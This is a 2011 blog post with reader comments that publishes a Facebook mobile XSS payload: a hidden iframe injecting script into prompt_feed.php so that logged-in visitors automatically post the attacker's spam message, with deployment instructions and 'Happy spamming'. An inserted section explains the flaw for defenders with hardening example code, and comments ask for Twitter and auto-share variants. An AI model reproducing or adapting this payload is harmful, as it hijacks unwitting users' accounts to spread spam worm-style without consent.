March 28, 2011
Autopost Spamming using Facebook Mobile XSS
Posted by: Joy : Category: Facebook Tips, Vulnerability
What has happened out there really pushes me to share this. I call this Autopost Spamming using Facebook Mobile XSS. I don’t care anymore if this one will be filtered; the faster they fix it, the better. People don’t seem to care how hard I tried to hide this code from the Facebook team. Frankly, I also use this to post spam with a link to this blog, but it only affects Indonesian IPs, with a custom interval. So people outside Indonesia won’t be able to see this. Too bad it’s now spread like a worm everywhere, wide open without any source code protection.
Never mind, it’s no use complaining about what has happened anyway. Let’s talk about this in detail. This is about how to make an automatic status update post to people’s Facebook profiles. This method uses an XSS vulnerability in prompt_feed.php on m.facebook.com. When people see our page with this evil code, they will automatically post a status update with any message we want.
Below is the iframe HTML source code :
<iframe id="CrazyDaVinci" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Just visited http://y.ahoo.it/gajeBA Wow.. cool! nice page dude!!!';document.forms[0].submit();}</script>"></iframe>
Put the code above on your website and change the red code to your own message. Whenever logged-in Facebook users see your page, the message will be posted automatically to their wall.
That’s all. Happy spamming
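For the defending side, the two properties the iframe above relies on are that user_message_prompt is written into the response unencoded and that the page agrees to load inside a frame on another site. The following is an added example, not code from this post or from Facebook: the handler, its markup and the sample input are hypothetical, and only the parameter name comes from the post.

```javascript
// Added example, not Facebook's code. The handler, its markup and the sample
// input are hypothetical; only the parameter name comes from the post.

// Encode every character that can close a text node or a quoted attribute.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Shared page template (assumed layout): a prompt label above a message form.
function formHtml(promptMarkup) {
  return '<form method="post"><label>' + promptMarkup + '</label>' +
         '<textarea name="message"></textarea><input type="submit"></form>';
}

// Vulnerable shape: the query value is concatenated into the page as-is,
// so markup in the parameter becomes markup in the response.
function renderPromptVulnerable(query) {
  return { headers: {}, body: formHtml(query.user_message_prompt || '') };
}

// Hardened shape: encode on output, refuse framing, forbid inline script.
function renderPromptHardened(query) {
  return {
    headers: {
      // Stops the page from loading inside a hidden iframe on another site.
      'X-Frame-Options': 'DENY',
      // Second layer: if encoding is missed somewhere, inline <script>
      // blocks and inline event handlers still do not execute.
      'Content-Security-Policy':
        "default-src 'self'; script-src 'self'; frame-ancestors 'none'",
    },
    body: formHtml(escapeHtml(query.user_message_prompt || '')),
  };
}

// Constructed, harmless sample input.
const sample = { user_message_prompt: "'<script>marker()</script>" };
console.log(renderPromptVulnerable(sample).body);
console.log(renderPromptHardened(sample).body);
```

An anti-CSRF token on the form would not help against this particular bug, because injected script runs inside the page and submits the page's own form, token included.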












March 30th, 2011 at 6:31 pm
Please try again later
It doesn’t work anymore, bro
March 30th, 2011 at 11:21 pm
it’s filtered now :
http://crazydavinci.net/2011/03/statement-of-apology/#comment-2611
April 5th, 2011 at 4:20 am
I think there is another spamming method…
look here
http://img695.imageshack.us/i/53203773.png
April 5th, 2011 at 1:46 pm
if someone posts on the group the victim will automatically first comment 2 times
spoiler
http://img695.imageshack.us/i/53203773.png
how to stop it joy??
April 5th, 2011 at 5:20 pm
Hello, can the autopost be done on Twitter,
so that every time someone visits, it updates the status on their Twitter.. . .
April 6th, 2011 at 5:26 pm
@zhelin
where is the group URL? the image is not clear, I can’t see what’s really going on there…
@kemalzack
I’ll take a look later, bro..
oh right, I haven’t tinkered with Twitter yet, it’s been a long time too
so far only updating via
April 8th, 2011 at 8:50 am
joy here http://www.facebook.com/home.php?sk=group_199940393355692&ap=1
if you try to post you will notice it
April 10th, 2011 at 1:46 pm
ok will try later, I’m gonna make a new post first.. hhe..
April 19th, 2011 at 8:21 am
Brada can you make a code like auto share by using this code: http://www.facebook.com/sharer.php?u=http://crazydavinci.net/2011/03/autopost-spamming-using-facebook-mobile-xss/#more-1307
April 22nd, 2011 at 12:44 am
ah yes,,, really sorry. even if I know how, I don’t think I would share some kind of autopost/share code again, as many malicious coders out there would abuse it again just like before.